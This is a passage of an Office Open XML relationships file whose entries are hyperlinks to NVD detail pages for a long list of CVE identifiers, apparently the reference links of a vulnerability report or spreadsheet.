Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20342" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73496" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76425" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82053" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-14871" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-1168" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18212" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20247" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20343" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67376" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69852" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69881" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69890" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71330" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72928" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76442" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77494" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77498" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77499" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77501" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77502" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77886" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77888" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77889" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77890" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77893" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77895" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79651" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88032" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92128" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92129" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9336" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20222" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17526" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76424" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82061" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82071" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20300" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82052" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82054" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82055" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82057" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82058" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82065" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82068" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82070" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82073" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82074" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92456" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68840" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69319" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69413" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69422" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69814" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69816" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69817" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69818" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69834" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69838" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69859" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69866" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69889" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69891" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69896" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69911" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70283" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70562" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70565" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70567" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70568" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71332" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71333" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73022" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77894" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77899" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82062" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20248" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69490" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77892" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92140" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69469" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20283" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20287" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53716" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53719" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62801" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66816" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67369" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67383" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67386" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67633" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69839" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70019" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76438" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82059" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82069" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84859" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84993" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92139" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92468" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92750" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-11222" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69874" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77887" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77891" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92358" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20309" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88034" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88036" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82056" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82063" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70091" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92591" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20120" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20290" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54246" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68830" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68831" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69286" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69343" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69457" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69527" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69808" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69862" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70145" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77491" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88035" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92132" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92133" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19607" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20121" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76433" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76439" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76444" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76447" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92568" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9338" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90563" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19729" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20072" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20235" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20282" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76426" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76427" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76428" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76431" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76432" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76434" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76446" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76448" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76449" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76450" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76451" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89298" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19619" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20350" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68849" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69832" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69853" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69895" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69548" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78547" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86341" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16794" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20285" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20286" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 